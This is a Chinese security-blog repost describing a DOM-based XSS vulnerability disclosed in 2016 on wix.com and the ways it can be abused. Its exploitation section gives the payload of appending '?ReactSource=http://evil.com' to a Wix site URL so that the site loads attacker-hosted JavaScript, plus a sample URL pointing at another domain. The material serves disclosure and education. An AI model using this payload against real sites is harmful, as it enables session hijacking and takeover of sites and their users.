记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

wix.com的Dom-Basic XSS漏洞

2016-11-05 02:05

前言

wix.com是Java和HTML5出版平台,目前用户已经超过了数百万。而最近有研究人员在wix.com上面发现了基于DOM的跨站脚本漏洞,该漏洞被攻击者利用来对任何运行在wix.com上面的网站并获取控制权。

什么是Dom-Basic XSS

基于Dom的XSS攻击,其中攻击的有效载荷在受害者使用的浏览器上修改Dom环境从而被用作是原客户端的脚本,客户端的代码在一个“意外”的方式下运行,也就是说,页面本身不会改变,但是页面中包含的客户端代码由于DOM环境中发生的恶意修改而有所不同。

基于DOM的XSS攻击与常见的XSS攻击截然不同,由于服务器端脆弱性而在响应页面中提供恶意有效载荷。

利用

在wix.com上有一个严重的DOM-XSS漏洞,允许攻击者完全控制人和托管在wix上面的网站。只需要将一个参数添加到在wix上面创建的任何网站,攻击者可以导致目标网站加载并运行一部分攻击者的JavaScript。

方式:

  •  URL尾部添加: ?ReactSource=http://evil.com 这里的网站是你在wix.com上面创建的任何网站。
  •  确保evil.com在/packages-bin/wixCodeInit/wixCodeInit.min.js中包含一个恶意文件

这里有一个利用漏洞反射载荷的例子:

%e5%9b%be%e7%89%871

攻击方式

对与这个漏洞拥有两种不同的攻击方式:

一种是wix网站所有者为了吸引攻击者访问从而加载一个特定的JavaScript用于劫持浏览器的会话。wix网站的所有者可能会利用该漏洞去散发恶意软件,创建基于浏览器的动态分布式僵尸网络,挖掘电子货币,但通常是为了控制网站的内容以及使用它的用户。

另一种攻击方式是,用户被一个特制的URL引诱到Wix网站,该URL通过基于DOM的XSS攻击将JavaScript加载到目标Wix.com网站。

而在这两种情况下,攻击者需要编写恶意JavaScript并利用URL指向它(即“http://matt4592.wixsite.com/music?ReactSource=http://m-austin.com”)。

未经允许不得转载: » wix.com的Dom-Basic XSS漏洞

知识来源: www.mottoin.com/91302.html

阅读:184262 | 评论:0 | 标签:Web安全 DOM Javascript wix.com xss 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“wix.com的Dom-Basic XSS漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云